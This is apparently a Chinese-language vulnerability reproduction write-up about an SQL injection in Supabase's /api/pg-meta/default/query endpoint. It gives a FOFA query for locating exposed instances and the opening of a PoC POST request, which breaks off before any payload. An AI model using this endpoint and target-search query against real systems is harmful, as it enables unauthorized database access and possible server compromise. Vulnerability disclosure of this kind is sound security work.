Supabase 后端服务平台 SQL注入漏洞复现

0x01 产品简介

Supabase 是一个开源的 Firebase 替代品，以BaaS的形式向各种应用程序提供了一系列的后端功能，可以帮助开发者更快地构建产品。对于想快速实现一个产品而言，如果使用传统开发，又要兼顾前端开发，同时又要花费时间构建后端服务。Supabase能够让开发人员可以专注于前端开发，而无需花费大量时间和精力来构建和维护后端基础设施。Supbase 产品包括 Postgres 数据库和身份验证服务，存储和无服务器服务（用于后端逻辑）仍在开发中。它的所有工具大多是免费和开源的。Postgres 数据库包括与数据库相关的工具，例如对数据库修改的实时监控和一个管理界面。此外，它还提供了可与 Firebase 相媲美的快速 API 和语法。这允许您以一致的方式处理 CRUD 任务，让您专注于创建而不是重写重复的 CRUD 代码。

0x02 漏洞概述

由于Supabase 后端服务平台/api/pg-meta/default/query对用户传入的数据没有进行校验和过滤，导致攻击者传入的SQL语句直接带入到数据库执行，形成SQL注入，可获取数据库敏感信息，深入利用可获取服务器权限。

0x03 复现环境

FOFA：title="supabase"

0x04 漏洞复现

PoC

POST /api/pg-meta/default/query HTTP/1.1
Host: your-ip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Mac